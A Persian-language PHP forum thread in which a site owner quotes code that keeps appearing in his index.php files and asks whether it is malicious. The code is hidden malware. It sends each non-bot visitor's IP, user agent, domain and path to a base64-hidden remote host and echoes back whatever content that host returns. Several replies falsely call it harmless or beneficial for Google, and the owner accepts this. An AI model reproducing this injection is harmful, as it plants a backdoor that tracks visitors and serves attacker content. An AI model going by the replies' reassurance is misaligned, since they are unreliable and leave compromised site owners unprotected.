به نظرتون این کدها چی هستن؟

k2gtx

Member
سلام. من یه سایت دارم که با PHP نوشتم. مشکلی که دارم اینه که هاست میاد روی صفحاتی که اسمشون Index هست و پسوند php دارند این کد رو اضافه میکنه.
اول میخوام ببینم این کد چیه؟ آیا مخربه؟!
درضمن هاست من رایگان نیست و بابتش هزینه دادم.
پیشاپیش ممنونم که جواب میدین.
البته میدونم یه چیزی در مورد موتورهای جستجو هست. ولی نمیدونم چیکار میکنه؟ یا اصلا چرا سرور اینا رو اضافه میکنه؟!

[PHPS]<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>[/PHPS]

آخرین ویرایش:

perna

Member
این ها فکر می کنم برای بات های گوگل هستش
مشکلی فکر نمی کنم ایجاد کنه
داره اطلاعات سایتتون رو به گوگل میده
احتمالا هاست شما برای اینکه malware نداشته باشه سایتتون با گوگل چک می کنه
فکر می کنم البته اینطور باشه ، مطمئن نیستم

ziXet

مدیر انجمن PHP/MYSQL
توش دستور echo داره! ببین چه چیزیو داره echo میکنه

mostafabibin2

Well-Known Member
یک مزیت محسوب میشه. خیلی خوبه. این کد به گوگل اجازه می ده که از سایت شما یک چارت کارآمد درست کنه تا موتورهای جستجو بهتر با سایتت کنار بیان

k2gtx

Member
احتمالا هاست شما برای اینکه malware نداشته باشه سایتتون با گوگل چک می کنه
ممنونم

توش دستور echo داره! ببین چه چیزیو داره echo میکنه
چیز اضافه ای توی سورس صفحات باز شده با فایرفوکس نیست!

یک مزیت محسوب میشه. خیلی خوبه. این کد به گوگل اجازه می ده که از سایت شما یک چارت کارآمد درست کنه تا موتورهای جستجو بهتر با سایتت کنار بیان
ممنونم.

جدیدترین ارسال ها

بالا